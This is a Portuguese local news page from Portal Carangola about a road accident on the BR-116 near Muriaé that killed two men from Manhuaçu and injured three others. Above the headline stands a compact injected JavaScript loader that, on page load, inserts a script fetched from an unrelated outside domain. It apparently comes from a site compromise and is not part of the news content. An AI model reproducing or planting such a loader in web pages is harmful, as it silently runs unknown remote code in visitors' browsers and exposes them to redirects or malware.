;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dois moradores de Manhuaçu morrem em acidente perto de Muriaé - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Dois moradores de Manhuaçu morrem em acidente perto de Muriaé

Um acidente na Serra do Belvedere, na BR-116, próximo a Muriaé, na manhã deste sábado (9), causou a morte de duas pessoas de Manhuaçu. O Fiat Uno, placa GYS 0091 – Simonésia/MG, que tinha cinco ocupantes bateu em uma carreta de placa IHU 4250 – Caxias do Sul/RS, que trafegava do Rio de Janeiro para Bahia carregada de produtos diversos.

O acidente ocorreu às 7h e, segundo o motorista da carreta, Jorge Alberto Pablo, que nada sofreu, assim que fez a curva deparou com o Uno já na contramão, sem ter como evitar o choque. Com o impacto o Fiat rodou e parou à beira da pista. Wanderlei Domingos Pereira, 55 anos, morador de Manhuaçu, morreu no local. Obédi Joaquim Simão, 56 anos, chegou a ser socorrido, mas também faleceu.

Foram socorridos por ambulâncias e militares do Corpo de Bombeiros e encaminhados ao Hospital São Paulo, em Muriaé, as outras três vítimas: Geraldo Magela da Silva, que sofreu ferimentos graves; Henrique Simão e Joel Francine dos Santos, ambos com ferimentos leves.

A Polícia Rodoviária Federal atendeu a ocorrência e controlou o trânsito, que ficou lento, até o término do trabalho do Perito Heldino e do auxiliar Ivanildo (Preto do IML), que liberaram o corpo para o IML de Muriaé.

Fonte e fotos: Cláudio Cordeiro – www.interligadonline.com

Ofertas

[secvitrine/automoveis/68585]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.